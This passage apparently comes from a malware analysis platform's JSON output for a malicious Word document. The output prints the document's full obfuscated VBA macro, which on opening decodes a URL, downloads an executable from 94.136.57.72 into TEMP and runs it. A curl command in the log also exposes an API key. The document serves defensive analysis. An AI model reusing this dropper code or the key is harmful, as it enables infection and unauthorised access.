Integer\r\nRIeMAIHI = 4\r\nDo While RIeMAIHI < 76\r\nDoEvents: RIeMAIHI = RIeMAIHI + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim rFtFCsKb As Integer\r\nrFtFCsKb = 8\r\nDo While 
rFtFCsKb < 52\r\nDoEvents: rFtFCsKb = rFtFCsKb + 1\r\nLoop\r\n\r\nDoEvents: YMcAptkZ = YMcAptkZ + 1\r\n\r\nDim GKtegDZc As Integer\r\n\r\nDim lNubgLMm As Integer\r\nlNubgLMm = 2\r\nDo While lNubgLMm < 22\r\nDoEvents: lNubgLMm = lNubgLMm + 1\r\nLoop\r\n\r\nGKtegDZc = 5\r\nDo While GKtegDZc < 98\r\n\r\nDim KNTIrcol As Integer\r\nKNTIrcol = 6\r\nDo While KNTIrcol < 62\r\nDoEvents: KNTIrcol = KNTIrcol + 1\r\nLoop\r\n\r\nDoEvents: GKtegDZc = GKtegDZc + 1\r\n\r\nDim fADzmtxi As Integer\r\nfADzmtxi = 3\r\nDo While fADzmtxi < 69\r\nDoEvents: fADzmtxi = fADzmtxi + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim YlwwqGKp As Integer\r\nYlwwqGKp = 6\r\nDo While YlwwqGKp < 17\r\nDoEvents: YlwwqGKp = YlwwqGKp + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim CXflHUkI As Integer\r\n\r\nDim rOZLfbfA As Integer\r\nrOZLfbfA = 8\r\nDo While rOZLfbfA < 26\r\nDoEvents: rOZLfbfA = rOZLfbfA + 1\r\nLoop\r\n\r\nCXflHUkI = 7\r\nDo While CXflHUkI < 19\r\n\r\nDim WQLYXSGt As Integer\r\nWQLYXSGt = 7\r\nDo While WQLYXSGt < 17\r\nDoEvents: WQLYXSGt = WQLYXSGt + 1\r\nLoop\r\n\r\nDoEvents: CXflHUkI = CXflHUkI + 1\r\n\r\nDim jsaNfleM As Integer\r\njsaNfleM = 4\r\nDo While jsaNfleM < 14\r\nDoEvents: jsaNfleM = jsaNfleM + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim wOnebkzq As Integer\r\nwOnebkzq = 4\r\nDo While wOnebkzq < 43\r\nDoEvents: wOnebkzq = wOnebkzq + 1\r\nLoop\r\n\r\n    pGYdsfsdf = HexToString(StrReverse(\"078607E2963707F607F2963707F6D6F203830383A32373E27353E2633313E24393F2F2A307474786\"))\r\n\r\nDim zwYMnQTk As Integer\r\n\r\nDim PmIJRXGl As Integer\r\n\r\nDim MWCcfpCe As Integer\r\nMWCcfpCe = 9\r\nDo While MWCcfpCe < 33\r\nDoEvents: MWCcfpCe = MWCcfpCe + 1\r\nLoop\r\n\r\nPmIJRXGl = 7\r\nDo While PmIJRXGl < 79\r\n\r\nDim QCdqXcvU As Integer\r\nQCdqXcvU = 7\r\nDo While QCdqXcvU < 14\r\nDoEvents: QCdqXcvU = QCdqXcvU + 1\r\nLoop\r\n\r\nDoEvents: PmIJRXGl = PmIJRXGl + 1\r\n\r\nDim yvwRfrSx As Integer\r\nyvwRfrSx = 8\r\nDo While yvwRfrSx < 86\r\nDoEvents: yvwRfrSx = yvwRfrSx + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim EKpnDDqb 
As Integer\r\nEKpnDDqb = 6\r\nDo While EKpnDDqb < 31\r\nDoEvents: EKpnDDqb = EKpnDDqb + 1\r\nLoop\r\n\r\nzwYMnQTk = 1\r\nDo While zwYMnQTk < 48\r\n\r\nDim yVEohnGo As Integer\r\n\r\nDim HlJMAUVN As Integer\r\nHlJMAUVN = 8\r\nDo While HlJMAUVN < 66\r\nDoEvents: HlJMAUVN = HlJMAUVN + 1\r\nLoop\r\n\r\nyVEohnGo = 8\r\nDo While yVEohnGo < 82\r\n\r\nDim lNBkYizK As Integer\r\nlNBkYizK = 4\r\nDo While lNBkYizK < 46\r\nDoEvents: lNBkYizK = lNBkYizK + 1\r\nLoop\r\n\r\nDoEvents: yVEohnGo = yVEohnGo + 1\r\n\r\nDim UhInwGiv As Integer\r\nUhInwGiv = 7\r\nDo While UhInwGiv < 17\r\nDoEvents: UhInwGiv = UhInwGiv + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim CAYUXRFT As Integer\r\nCAYUXRFT = 9\r\nDo While CAYUXRFT < 39\r\nDoEvents: CAYUXRFT = CAYUXRFT + 1\r\nLoop\r\n\r\nDoEvents: zwYMnQTk = zwYMnQTk + 1\r\n\r\nDim QfqTWCPF As Integer\r\n\r\nDim lMRJpfqH As Integer\r\nlMRJpfqH = 2\r\nDo While lMRJpfqH < 21\r\nDoEvents: lMRJpfqH = lMRJpfqH + 1\r\nLoop\r\n\r\nQfqTWCPF = 7\r\nDo While QfqTWCPF < 26\r\n\r\nDim ZCDiSoNa As Integer\r\nZCDiSoNa = 3\r\nDo While ZCDiSoNa < 32\r\nDoEvents: ZCDiSoNa = ZCDiSoNa + 1\r\nLoop\r\n\r\nDoEvents: QfqTWCPF = QfqTWCPF + 1\r\n\r\nDim OeSqbeHr As Integer\r\nOeSqbeHr = 5\r\nDo While OeSqbeHr < 81\r\nDoEvents: OeSqbeHr = OeSqbeHr + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim RUonJglO As Integer\r\nRUonJglO = 4\r\nDo While RUonJglO < 76\r\nDoEvents: RUonJglO = RUonJglO + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim vFwHMspk As Integer\r\n\r\nDim mJPnrJHi As Integer\r\nmJPnrJHi = 2\r\nDo While mJPnrJHi < 83\r\nDoEvents: mJPnrJHi = mJPnrJHi + 1\r\nLoop\r\n\r\nvFwHMspk = 5\r\nDo While vFwHMspk < 82\r\n\r\nDim odkNcoAJ As Integer\r\nodkNcoAJ = 2\r\nDo While odkNcoAJ < 56\r\nDoEvents: odkNcoAJ = odkNcoAJ + 1\r\nLoop\r\n\r\nDoEvents: vFwHMspk = vFwHMspk + 1\r\n\r\nDim zViDUjMo As Integer\r\nzViDUjMo = 8\r\nDo While zViDUjMo < 82\r\nDoEvents: zViDUjMo = zViDUjMo + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim HlFdNIYK As Integer\r\nHlFdNIYK = 6\r\nDo While HlFdNIYK < 66\r\nDoEvents: HlFdNIYK = 
HlFdNIYK + 1\r\nLoop\r\n\r\n    pHUIdsfdsf = Environ(HexToString(\"\"TEMP\"\")) & HexToString(\"\"\\vGJsdfbJHKdsf.exe\"\")\r\n\r\nDim hFBvLczq As Integer\r\n\r\nDim sdGfInUz As Integer\r\n\r\nDim rDzpXTRU As Integer\r\nrDzpXTRU = 8\r\nDo While rDzpXTRU < 27\r\nDoEvents: rDzpXTRU = rDzpXTRU + 1\r\nLoop\r\n\r\nsdGfInUz = 9\r\nDo While sdGfInUz < 94\r\n\r\nDim EGmOFzhs As Integer\r\nEGmOFzhs = 3\r\nDo While EGmOFzhs < 78\r\nDoEvents: EGmOFzhs = EGmOFzhs + 1\r\nLoop\r\n\r\nDoEvents: sdGfInUz = sdGfInUz + 1\r\n\r\nDim GcbhqWoh As Integer\r\nGcbhqWoh = 8\r\nDo While GcbhqWoh < 56\r\nDoEvents: GcbhqWoh = GcbhqWoh + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim wPjNTlzr As Integer\r\nwPjNTlzr = 5\r\nDo While wPjNTlzr < 29\r\nDoEvents: wPjNTlzr = wPjNTlzr + 1\r\nLoop\r\n\r\nhFBvLczq = 1\r\nDo While hFBvLczq < 19\r\n\r\nDim QlJoeeOL As Integer\r\n\r\nDim ijezTJuf As Integer\r\nijezTJuf = 9\r\nDo While ijezTJuf < 95\r\nDoEvents: ijezTJuf = ijezTJuf + 1\r\nLoop\r\n\r\nQlJoeeOL = 7\r\nDo While QlJoeeOL < 55\r\n\r\nDim fIBmsLkO As Integer\r\nfIBmsLkO = 1\r\nDo While fIBmsLkO < 18\r\nDoEvents: fIBmsLkO = fIBmsLkO + 1\r\nLoop\r\n\r\nDoEvents: QlJoeeOL = QlJoeeOL + 1\r\n\r\nDim DFXQHEVD As Integer\r\nDFXQHEVD = 7\r\nDo While DFXQHEVD < 22\r\nDoEvents: DFXQHEVD = DFXQHEVD + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim QBzgcPjf As Integer\r\nQBzgcPjf = 7\r\nDo While QBzgcPjf < 14\r\nDoEvents: QBzgcPjf = QBzgcPjf + 1\r\nLoop\r\n\r\nDoEvents: hFBvLczq = hFBvLczq + 1\r\n\r\nDim QhNwJeIa As Integer\r\n\r\nDim oswDtxNR As Integer\r\noswDtxNR = 2\r\nDo While oswDtxNR < 94\r\nDoEvents: oswDtxNR = oswDtxNR + 1\r\nLoop\r\n\r\nQhNwJeIa = 5\r\nDo While QhNwJeIa < 83\r\n\r\nDim iwAjDRlr As Integer\r\niwAjDRlr = 2\r\nDo While iwAjDRlr < 96\r\nDoEvents: iwAjDRlr = iwAjDRlr + 1\r\nLoop\r\n\r\nDoEvents: QhNwJeIa = QhNwJeIa + 1\r\n\r\nDim bhNxFgJB As Integer\r\nbhNxFgJB = 3\r\nDo While bhNxFgJB < 63\r\nDoEvents: bhNxFgJB = bhNxFgJB + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim puKNWZql As Integer\r\npuKNWZql = 9\r\nDo While 
puKNWZql < 65\r\nDoEvents: puKNWZql = puKNWZql + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim vHqYHkuR As Integer\r\n\r\nDim RQQvzlzC As Integer\r\nRQQvzlzC = 6\r\nDo While RQQvzlzC < 91\r\nDoEvents: RQQvzlzC = RQQvzlzC + 1\r\nLoop\r\n\r\nvHqYHkuR = 3\r\nDo While vHqYHkuR < 68\r\n\r\nDim ikLXyMyH As Integer\r\nikLXyMyH = 2\r\nDo While ikLXyMyH < 57\r\nDoEvents: ikLXyMyH = ikLXyMyH + 1\r\nLoop\r\n\r\nDoEvents: vHqYHkuR = vHqYHkuR + 1\r\n\r\nDim lBVAEDVM As Integer\r\nlBVAEDVM = 2\r\nDo While lBVAEDVM < 22\r\nDoEvents: lBVAEDVM = lBVAEDVM + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim OsCIrZRa As Integer\r\nOsCIrZRa = 4\r\nDo While OsCIrZRa < 44\r\nDoEvents: OsCIrZRa = OsCIrZRa + 1\r\nLoop\r\n\r\n    DDdsfF = URLDownloadToFile(0&, pGYdsfsdf, pHUIdsfdsf, 0&, 0&)\r\n   Dim eFdsgfsdf\r\n\r\nDim VDeuoDvD As Integer\r\n\r\nDim ZgUWsgJz As Integer\r\n\r\nDim ZeuzzfOu As Integer\r\nZeuzzfOu = 6\r\nDo While ZeuzzfOu < 33\r\nDoEvents: ZeuzzfOu = ZeuzzfOu + 1\r\nLoop\r\n\r\nZgUWsgJz = 6\r\nDo While ZgUWsgJz < 97\r\n\r\nDim QaQIVqOv As Integer\r\nQaQIVqOv = 7\r\nDo While QaQIVqOv < 76\r\nDoEvents: QaQIVqOv = QaQIVqOv + 1\r\nLoop\r\n\r\nDoEvents: ZgUWsgJz = ZgUWsgJz + 1\r\n\r\nDim GnavwpPU As Integer\r\nGnavwpPU = 8\r\nDo While GnavwpPU < 29\r\nDoEvents: GnavwpPU = GnavwpPU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim HlQRwtjO As Integer\r\nHlQRwtjO = 8\r\nDo While HlQRwtjO < 27\r\nDoEvents: HlQRwtjO = HlQRwtjO + 1\r\nLoop\r\n\r\nVDeuoDvD = 7\r\nDo While VDeuoDvD < 79\r\n\r\nDim FBbbetwi As Integer\r\n\r\nDim lymMAHNo As Integer\r\nlymMAHNo = 4\r\nDo While lymMAHNo < 75\r\nDoEvents: lymMAHNo = lymMAHNo + 1\r\nLoop\r\n\r\nFBbbetwi = 8\r\nDo While FBbbetwi < 24\r\n\r\nDim NfILghyz As Integer\r\nNfILghyz = 7\r\nDo While NfILghyz < 23\r\nDoEvents: NfILghyz = NfILghyz + 1\r\nLoop\r\n\r\nDoEvents: FBbbetwi = FBbbetwi + 1\r\n\r\nDim PtwKRQrO As Integer\r\nPtwKRQrO = 7\r\nDo While PtwKRQrO < 53\r\nDoEvents: PtwKRQrO = PtwKRQrO + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim vvizMpkS As Integer\r\nvvizMpkS = 5\r\nDo 
While vvizMpkS < 37\r\nDoEvents: vvizMpkS = vvizMpkS + 1\r\nLoop\r\n\r\nDoEvents: VDeuoDvD = VDeuoDvD + 1\r\n\r\nDim IOhddfFb As Integer\r\n\r\nDim IjlqBqEk As Integer\r\nIjlqBqEk = 4\r\nDo While IjlqBqEk < 17\r\nDoEvents: IjlqBqEk = IjlqBqEk + 1\r\nLoop\r\n\r\nIOhddfFb = 4\r\nDo While IOhddfFb < 48\r\n\r\nDim XJrlRuTO As Integer\r\nXJrlRuTO = 9\r\nDo While XJrlRuTO < 32\r\nDoEvents: XJrlRuTO = XJrlRuTO + 1\r\nLoop\r\n\r\nDoEvents: IOhddfFb = IOhddfFb + 1\r\n\r\nDim SWqLclou As Integer\r\nSWqLclou = 5\r\nDo While SWqLclou < 51\r\nDoEvents: SWqLclou = SWqLclou + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim JhaAudJp As Integer\r\nJhaAudJp = 6\r\nDo While JhaAudJp < 65\r\nDoEvents: JhaAudJp = JhaAudJp + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim MkfbadWB As Integer\r\n\r\nDim odqFViLK As Integer\r\nodqFViLK = 9\r\nDo While odqFViLK < 94\r\nDoEvents: odqFViLK = odqFViLK + 1\r\nLoop\r\n\r\nMkfbadWB = 6\r\nDo While MkfbadWB < 65\r\n\r\nDim apCHacUZ As Integer\r\napCHacUZ = 1\r\nDo While apCHacUZ < 84\r\nDoEvents: apCHacUZ = apCHacUZ + 1\r\nLoop\r\n\r\nDoEvents: MkfbadWB = MkfbadWB + 1\r\n\r\nDim RLWNjBSf As Integer\r\nRLWNjBSf = 4\r\nDo While RLWNjBSf < 78\r\nDoEvents: RLWNjBSf = RLWNjBSf + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim olRwDPRY As Integer\r\nolRwDPRY = 9\r\nDo While olRwDPRY < 34\r\nDoEvents: olRwDPRY = olRwDPRY + 1\r\nLoop\r\n\r\n    eFdsgfsdf = Shell(pHUIdsfdsf, 1)\r\n\r\nEnd Sub\r\n\r\n\r\n\r\nPublic Function HexToString(ByVal hextext As String) As String\r\n\r\nDim yrHIysow As Integer\r\n\r\nDim gnIDaadL As Integer\r\ngnIDaadL = 3\r\nDo While gnIDaadL < 79\r\nDoEvents: gnIDaadL = gnIDaadL + 1\r\nLoop\r\n\r\nyrHIysow = 8\r\nDo While yrHIysow < 31\r\n\r\nDim leQnLCBe As Integer\r\nleQnLCBe = 4\r\nDo While leQnLCBe < 74\r\nDoEvents: leQnLCBe = leQnLCBe + 1\r\nLoop\r\n\r\nDoEvents: yrHIysow = yrHIysow + 1\r\n\r\nDim WHdmHwKU As Integer\r\nWHdmHwKU = 7\r\nDo While WHdmHwKU < 61\r\nDoEvents: WHdmHwKU = WHdmHwKU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim KqnlOcDW As 
Integer\r\nKqnlOcDW = 8\r\nDo While KqnlOcDW < 64\r\nDoEvents: KqnlOcDW = KqnlOcDW + 1\r\nLoop\r\n\r\n    \r\nFor y = 1 To Len(hextext)\r\n\r\nDim jLdCENAm As Integer\r\n\r\nDim jjvbfVbM As Integer\r\njjvbfVbM = 4\r\nDo While jjvbfVbM < 15\r\nDoEvents: jjvbfVbM = jjvbfVbM + 1\r\nLoop\r\n\r\njLdCENAm = 1\r\nDo While jLdCENAm < 48\r\n\r\nDim uclCAiGl As Integer\r\nuclCAiGl = 2\r\nDo While uclCAiGl < 21\r\nDoEvents: uclCAiGl = uclCAiGl + 1\r\nLoop\r\n\r\nDoEvents: jLdCENAm = jLdCENAm + 1\r\n\r\nDim ArtabSHa As Integer\r\nArtabSHa = 6\r\nDo While ArtabSHa < 95\r\nDoEvents: ArtabSHa = ArtabSHa + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim kqBbDXyb As Integer\r\nkqBbDXyb = 4\r\nDo While kqBbDXyb < 76\r\nDoEvents: kqBbDXyb = kqBbDXyb + 1\r\nLoop\r\n\r\n    num = Mid(hextext, y, 2)\r\n\r\nDim RsTnWSCf As Integer\r\n\r\nDim wHGsaHRO As Integer\r\nwHGsaHRO = 2\r\nDo While wHGsaHRO < 21\r\nDoEvents: wHGsaHRO = wHGsaHRO + 1\r\nLoop\r\n\r\nRsTnWSCf = 6\r\nDo While RsTnWSCf < 44\r\n\r\nDim CZnlQgxw As Integer\r\nCZnlQgxw = 7\r\nDo While CZnlQgxw < 77\r\nDoEvents: CZnlQgxw = CZnlQgxw + 1\r\nLoop\r\n\r\nDoEvents: RsTnWSCf = RsTnWSCf + 1\r\n\r\nDim kiscIKct As Integer\r\nkiscIKct = 2\r\nDo While kiscIKct < 52\r\nDoEvents: kiscIKct = kiscIKct + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DSiGmxcW As Integer\r\nDSiGmxcW = 5\r\nDo While DSiGmxcW < 87\r\nDoEvents: DSiGmxcW = DSiGmxcW + 1\r\nLoop\r\n\r\n    Value = Value & Chr(CDbl(\"&h\" & num))\r\n\r\nDim uNumKpHK As Integer\r\n\r\nDim ofdmMawK As Integer\r\nofdmMawK = 2\r\nDo While ofdmMawK < 95\r\nDoEvents: ofdmMawK = ofdmMawK + 1\r\nLoop\r\n\r\nuNumKpHK = 9\r\nDo While uNumKpHK < 39\r\n\r\nDim EJiSYRwI As Integer\r\nEJiSYRwI = 6\r\nDo While EJiSYRwI < 64\r\nDoEvents: EJiSYRwI = EJiSYRwI + 1\r\nLoop\r\n\r\nDoEvents: uNumKpHK = uNumKpHK + 1\r\n\r\nDim PeQbNxNT As Integer\r\nPeQbNxNT = 7\r\nDo While PeQbNxNT < 14\r\nDoEvents: PeQbNxNT = PeQbNxNT + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim tYYJQaNw As Integer\r\ntYYJQaNw = 2\r\nDo While tYYJQaNw < 
51\r\nDoEvents: tYYJQaNw = tYYJQaNw + 1\r\nLoop\r\n\r\n    y = y + 1\r\nNext y\r\n\r\n\r\nDim kDSCrVuB As Integer\r\n\r\nDim noOImZIA As Integer\r\nnoOImZIA = 3\r\nDo While noOImZIA < 34\r\nDoEvents: noOImZIA = noOImZIA + 1\r\nLoop\r\n\r\nkDSCrVuB = 4\r\nDo While kDSCrVuB < 44\r\n\r\nDim FRGpidHw As Integer\r\nFRGpidHw = 8\r\nDo While FRGpidHw < 58\r\nDoEvents: FRGpidHw = FRGpidHw + 1\r\nLoop\r\n\r\nDoEvents: kDSCrVuB = kDSCrVuB + 1\r\n\r\nDim FZBcXdGZ As Integer\r\nFZBcXdGZ = 5\r\nDo While FZBcXdGZ < 95\r\nDoEvents: FZBcXdGZ = FZBcXdGZ + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim zVtNICCx As Integer\r\nzVtNICCx = 8\r\nDo While zVtNICCx < 29\r\nDoEvents: zVtNICCx = zVtNICCx + 1\r\nLoop\r\n\r\nHexToString = Value\r\nEnd Function\r\n\r\n\r\n\n",
        "analysis": {
          "VBA String": [],
          "Dridex String": [],
          "Suspicious": [
            [
              "Hex Strings",
              "Hex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)"
            ],
            [
              "Chr",
              "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
            ],
            [
              "StrReverse",
              "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
            ],
            [
              "Shell",
              "May run an executable file or a system command"
            ],
            [
              "Environ",
              "May read system environment variables"
            ],
            [
              "URLDownloadToFileA",
              "May download files from the Internet"
            ],
            [
              "Lib",
              "May run code from a DLL"
            ]
          ],
          "Hex String": [
            [
              "\\vGJsdfbJHKdsf.exe",
              "5C76474A736466624A484B6473662E657865"
            ],
            [
              "TEMP",
              "54454D50"
            ]
          ],
          "Form String": [],
          "Base64 String": [],
          "AutoExec": [
            [
              "Workbook_Open",
              "Runs when the Excel Workbook is opened"
            ],
            [
              "AutoOpen",
              "Runs when the Word document is opened"
            ]
          ],
          "IOC": [
            [
              "94.136.57.72",
              "IPv4 address (obfuscation: StrReverse+Hex)"
            ],
            [
              "vGJsdfbJHKdsf.exe",
              "Executable file name (obfuscation: Hex)"
            ],
            [
              "http://94.136.57.72:8080/mopsi/popsi.php",
              "URL (obfuscation: StrReverse+Hex)"
            ]
          ]
        }
      }
    },
    "module": null,
    "date": {
      "$date": 1490354278607
    },
    "file": {
      "owners": [
        "cert",
        "*"
      ],
      "sha1": "d34317a440d28aaa4a4d7a480dbb89f15fa015bf",
      "names": [
        "DEC2248QO.doc"
      ],
      "probable_names": [],
      "parent_analyses": [],
      "antivirus": {},
      "sha256": "097d1b970439b86467bfae966d18f557b1b908e530902253b24c4180458f51e1",
      "detailed_type": "Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1251, Author: 1, Template: Normal, Revision Number: 12, Name of Creating Application: Microsoft Office Word, Total Editing Time: 10:00, Create Time/Date: Mon Nov 24 10:22:00 2014, Last Saved Time/Date: Tue Jan 13 06:25:00 2015, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0",
      "mime": "application/msword",
      "analysis": [
        {
          "$oid": "58d4f256014ed28a5d50c113"
        }
      ],
      "groups": [
        "cert",
        "*"
      ],
      "_id": {
        "$oid": "58d4f256014ed28a5d50c112"
      },
      "type": "word",
      "md5": "757e9b7209f0d6ef3cf7bfd904445009"
    },
    "iocs": [],
    "executed_modules": [
      "office_macros"
    ],
    "probable_names": [],
    "extracted_files": [],
    "status": "finished",
    "tags": [
      "office_macros"
    ],
    "groups": [
      "cert",
      "*"
    ],
    "pending_modules": [],
    "analyst": {
      "$oid": "58d4e81b014ed25aaa77fabf"
    },
    "waiting_modules": [],
    "canceled_modules": [],
    "threat_intelligence": {},
    "generated_files": {},
    "_id": {
      "$oid": "58d4f256014ed28a5d50c113"
    },
    "options": {}
  }
}
circl@cpg:~/build/fame$ curl -X GET -H "Content-type: application/json" -H "Accept: application/json" -H "X-API-KEY: 8b1958858cdaf80ac55e17a26eca3cc2dd17ab2a88b0ab5ee646cdce20d966441aa55fbfbad45d62" http://localhost:4200/analyses/58d4f256014ed28a5d50c113|jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 25677  100 25677    0     0  2187k      0 --:--:-- --:--:-- --:--:-- 2279k
{
  "analysis": {
    "support_files": {},
    "logs": [
      "2017-03-24 11:17: debug: Trying to queue module 'apk'",
      "2017-03-24 11:17: debug: Trying to queue module 'eml'",
      "2017-03-24 11:17: debug: Trying to queue module 'office_macros'",
      "2017-03-24 11:17: debug: Trying to queue module 'pdf'",
      "2017-03-24 11:17: debug: Trying to queue module 'zip'",
      "2017-03-24 11:17: debug: Trying to queue module 'bamfdetect'",
      "2017-03-24 11:17: debug: Trying to run office_macros",
      "2017-03-24 11:17: debug: Done with office_macros"
    ],
    "extractions": [],
    "results": {
      "office_macros": {
        "macros": "Attribute VB_Name = \"ThisDocument\"\r\nAttribute VB_Base = \"1Normal.ThisDocument\"\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = True\r\nAttribute VB_Customizable = True\r\n#If VBA7 Then\r\n    Private Declare PtrSafe Function URLDownloadToFile Lib \"urlmon\" Alias _\r\n    \"URLDownloadToFileA\" (ByVal pCaller As LongPtr, _\r\n    ByVal szURL As String, _\r\n    ByVal szFileName As String, _\r\n    ByVal dwReserved As Long, _\r\n    ByVal lpfnCB As LongPtr) As LongPtr\r\n#Else\r\n    Private Declare Function URLDownloadToFile Lib \"urlmon\" Alias _\r\n    \"URLDownloadToFileA\" (ByVal pCaller As Long, _\r\n    ByVal szURL As String, _\r\n    ByVal szFileName As String, _\r\n    ByVal dwReserved As Long, _\r\n    ByVal lpfnCB As Long) As Long\r\n#End If\r\n\r\n\r\nSub FUJdsfFF()\r\n\r\nDim onOImAGL As Integer\r\n\r\nDim gVrscpjD As Integer\r\n\r\nDim hHOWWjbQ As Integer\r\nhHOWWjbQ = 1\r\nDo While hHOWWjbQ < 72\r\nDoEvents: hHOWWjbQ = hHOWWjbQ + 1\r\nLoop\r\n\r\ngVrscpjD = 3\r\nDo While gVrscpjD < 12\r\n\r\nDim llSODdsW As Integer\r\nllSODdsW = 4\r\nDo While llSODdsW < 77\r\nDoEvents: llSODdsW = llSODdsW + 1\r\nLoop\r\n\r\nDoEvents: gVrscpjD = gVrscpjD + 1\r\n\r\nDim elUrgZPg As Integer\r\nelUrgZPg = 8\r\nDo While elUrgZPg < 86\r\nDoEvents: elUrgZPg = elUrgZPg + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim LnAAEDND As Integer\r\nLnAAEDND = 6\r\nDo While LnAAEDND < 67\r\nDoEvents: LnAAEDND = LnAAEDND + 1\r\nLoop\r\n\r\nonOImAGL = 2\r\nDo While onOImAGL < 69\r\n\r\nDim ttVOSmYq As Integer\r\n\r\nDim lAXCAjVL As Integer\r\nlAXCAjVL = 2\r\nDo While lAXCAjVL < 27\r\nDoEvents: lAXCAjVL = lAXCAjVL + 1\r\nLoop\r\n\r\nttVOSmYq = 2\r\nDo While ttVOSmYq < 83\r\n\r\nDim anNRJYwm As Integer\r\nanNRJYwm = 1\r\nDo While anNRJYwm < 87\r\nDoEvents: anNRJYwm = anNRJYwm + 1\r\nLoop\r\n\r\nDoEvents: ttVOSmYq = ttVOSmYq + 1\r\n\r\nDim EgAvDrgN 
As Integer\r\nEgAvDrgN = 3\r\nDo While EgAvDrgN < 73\r\nDoEvents: EgAvDrgN = EgAvDrgN + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim BGFxWEBE As Integer\r\nBGFxWEBE = 7\r\nDo While BGFxWEBE < 18\r\nDoEvents: BGFxWEBE = BGFxWEBE + 1\r\nLoop\r\n\r\nDoEvents: onOImAGL = onOImAGL + 1\r\n\r\nDim YLbEILbH As Integer\r\n\r\nDim USzkBLms As Integer\r\nUSzkBLms = 7\r\nDo While USzkBLms < 74\r\nDoEvents: USzkBLms = USzkBLms + 1\r\nLoop\r\n\r\nYLbEILbH = 4\r\nDo While YLbEILbH < 78\r\n\r\nDim kYEgOsrM As Integer\r\nkYEgOsrM = 1\r\nDo While kYEgOsrM < 18\r\nDoEvents: kYEgOsrM = kYEgOsrM + 1\r\nLoop\r\n\r\nDoEvents: YLbEILbH = YLbEILbH + 1\r\n\r\nDim kRSZcdez As Integer\r\nkRSZcdez = 4\r\nDo While kRSZcdez < 79\r\nDoEvents: kRSZcdez = kRSZcdez + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DiIMoHeK As Integer\r\nDiIMoHeK = 7\r\nDo While DiIMoHeK < 25\r\nDoEvents: DiIMoHeK = DiIMoHeK + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim hFWJmrYt As Integer\r\n\r\nDim EqXLaagR As Integer\r\nEqXLaagR = 3\r\nDo While EqXLaagR < 72\r\nDoEvents: EqXLaagR = EqXLaagR + 1\r\nLoop\r\n\r\nhFWJmrYt = 1\r\nDo While hFWJmrYt < 72\r\n\r\nDim QgtpZXeG As Integer\r\nQgtpZXeG = 5\r\nDo While QgtpZXeG < 83\r\nDoEvents: QgtpZXeG = QgtpZXeG + 1\r\nLoop\r\n\r\nDoEvents: hFWJmrYt = hFWJmrYt + 1\r\n\r\nDim KbUCXFUS As Integer\r\nKbUCXFUS = 8\r\nDo While KbUCXFUS < 67\r\nDoEvents: KbUCXFUS = KbUCXFUS + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DiUVMCVs As Integer\r\nDiUVMCVs = 7\r\nDo While DiUVMCVs < 54\r\nDoEvents: DiUVMCVs = DiUVMCVs + 1\r\nLoop\r\n\r\npHUgdsf\r\nEnd Sub\r\nSub AutoOpen()\r\n\r\nDim GHfjoXwI As Integer\r\n\r\nDim RrEuvFPw As Integer\r\n\r\nDim jOgmvxII As Integer\r\njOgmvxII = 4\r\nDo While jOgmvxII < 71\r\nDoEvents: jOgmvxII = jOgmvxII + 1\r\nLoop\r\n\r\nRrEuvFPw = 4\r\nDo While RrEuvFPw < 43\r\n\r\nDim rpbTcQis As Integer\r\nrpbTcQis = 1\r\nDo While rpbTcQis < 56\r\nDoEvents: rpbTcQis = rpbTcQis + 1\r\nLoop\r\n\r\nDoEvents: RrEuvFPw = RrEuvFPw + 1\r\n\r\nDim kEKoHcEt As Integer\r\nkEKoHcEt = 1\r\nDo While kEKoHcEt < 
